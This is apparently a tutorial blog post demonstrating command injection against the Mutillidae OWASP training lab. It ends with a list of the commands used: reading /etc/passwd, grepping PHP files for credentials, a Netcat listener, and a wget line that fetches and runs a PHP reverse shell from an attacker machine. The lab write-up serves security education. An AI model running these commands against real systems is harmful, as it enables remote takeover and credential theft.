In this post, we covered command injection vulnerability and performed a practical demonstration using Mutillidae OWASP Lab.

Command injection is widely spread and dangerous vulnerability that allows an attacker to remotely execute system commands that could lead to negative impacts ranging from data leak to full denial of service.

What’s Command Injection?

So, what is command injection? It’s a vulnerability that pops up when a web application doesn’t properly clean up the input it gets from users. Think about a search box or a comment section on a website. If an attacker can sneak in their own commands along with their input, they can trick the server into running those commands. It’s like telling the server to do one thing, but secretly making it do something else entirely.

My Step-by-Step Attack

In my demonstration, I used a DNS lookup tool in the lab to show how this works. Here’s how I went from a simple lookup to owning the whole system:

  1. Finding My Bearings: I started by appending some basic commands to the DNS lookup. I used pwd to see what directory I was in and cat /etc/passwd to see if I could read the system’s password file. Both worked, which confirmed the vulnerability.
  2. Digging for Gold (MySQL Credentials): My next goal was to find the database credentials. I used the find command to search for any PHP files that contained the words “password” or “user,” hoping to find a configuration file. This led me straight to the MySQL username (“root”) and password (“very level of application”).
  3. The Grand Finale: Getting a Shell: This is the ultimate goal for any attacker. I wanted to get a full, interactive shell on the server.
    • First, I set up a Netcat listener on my own machine. This is like opening a door and waiting for a connection to come through.
    • Next, I used the command injection vulnerability to make the server download a PHP reverse shell from my machine and then run it.
    • As soon as the server ran the script, it connected back to my listener, and just like that, I had a shell! I could now run commands like whoami and ls as if I were logged directly into the server.

Owning the System

With a shell on the machine, it was game over. I demonstrated how I could navigate the entire file system, read any file I wanted, and basically do anything I pleased. The system was now completely under my control. This really shows how a seemingly small flaw can lead to a total compromise.

Technical Commands I Used

Here’s a list of the commands I used during the attack:

  • pwd
  • cat /etc/passwd
  • find . -name "*.php" -exec grep -i "password" {} \;
  • find . -name "*.php" -exec grep -i "user\|login" {} \;
  • cat /var/www/html/mutillidae/config.inc
  • nc -lvp 4444
  • wget http://192.168.1.104/shell.php -O /tmp/shell.php && php /tmp/shell.php
  • id
  • ls
  • cd ..
  • cd /

Video Demonstration

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles